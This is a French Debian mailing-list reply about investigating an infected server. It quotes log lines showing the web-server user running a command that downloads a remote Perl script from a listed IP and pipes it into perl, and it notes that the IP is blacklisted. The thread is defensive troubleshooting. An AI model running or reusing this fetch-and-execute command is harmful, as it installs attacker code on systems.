Re: Machine vérolée

To: debian-user-french@lists.debian.org
Subject: Re: Machine vérolée
From: Michel Verdier <mv524@free.fr>
Date: Tue, 27 Jun 2023 12:48:36 +0200
Message-id: <[🔎] 87r0px42u3.fsf@free.fr>
In-reply-to: <[🔎] f5b5d31d-db15-20d7-6cde-7f71d638319f@systella.fr> ("BERTRAND Joël"'s message of "Tue, 27 Jun 2023 09:17:49 +0200")
References: <[🔎] b8975793-7a70-d931-ea65-44e8b0cc65f5@systella.fr> <[🔎] 87a5wqplse.fsf@free.fr> <[🔎] 36a828eb-f684-3c62-7759-5dc9ad7ccbcb@systella.fr> <[🔎] 618e2896-b1f0-6938-30ae-a950ba46a175@systella.fr> <[🔎] ZJijY6e7cJzx8RLG@dinot.net> <[🔎] fbeb1b79-e03a-7258-7113-354661ca9ddc@systella.fr> <[🔎] f0abee8b-6162-32a0-adc0-41f161e85428@systella.fr> <[🔎] f5b5d31d-db15-20d7-6cde-7f71d638319f@systella.fr>

Le 27 juin 2023 BERTRAND Joël a écrit :

> OK, je l'ai.
>
> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>
> J'ai le script perl (mais vous pouvez aussi le télécharger). Je ne sais
> toujours pas qui le lance, mais on progresse.

Bravo ! Le script est intéressant...
L'IP est listée :
https://check.spamhaus.org/listed/?searchterm=68.235.39.225
www.minpop.com semble utilisé dans le script et renvoie à des IP en Corée

Reply to:

References:
- Machine vérolée
  - From: BERTRAND Joël <joel.bertrand@systella.fr>
- Re: Machine vérolée
  - From: Michel Verdier <mv524@free.fr>
- Re: Machine vérolée
  - From: BERTRAND Joël <joel.bertrand@systella.fr>
- Re: Machine vérolée
  - From: BERTRAND Joël <joel.bertrand@systella.fr>
- Re: Machine vérolée
  - From: Sébastien Dinot <sebastien.dinot@free.fr>
- Re: Machine vérolée
  - From: BERTRAND Joël <joel.bertrand@systella.fr>
- Re: Machine vérolée
  - From: BERTRAND Joël <joel.bertrand@systella.fr>
- Re: Machine vérolée
  - From: BERTRAND Joël <joel.bertrand@systella.fr>

Prev by Date: Re: Migration Debian 11 -> 12 : PB firmware
Next by Date: Re: Signature des dépôts externes
Previous by thread: Re: Machine vérolée
Next by thread: Re: Machine vérolée
Index(es):
- Date
- Thread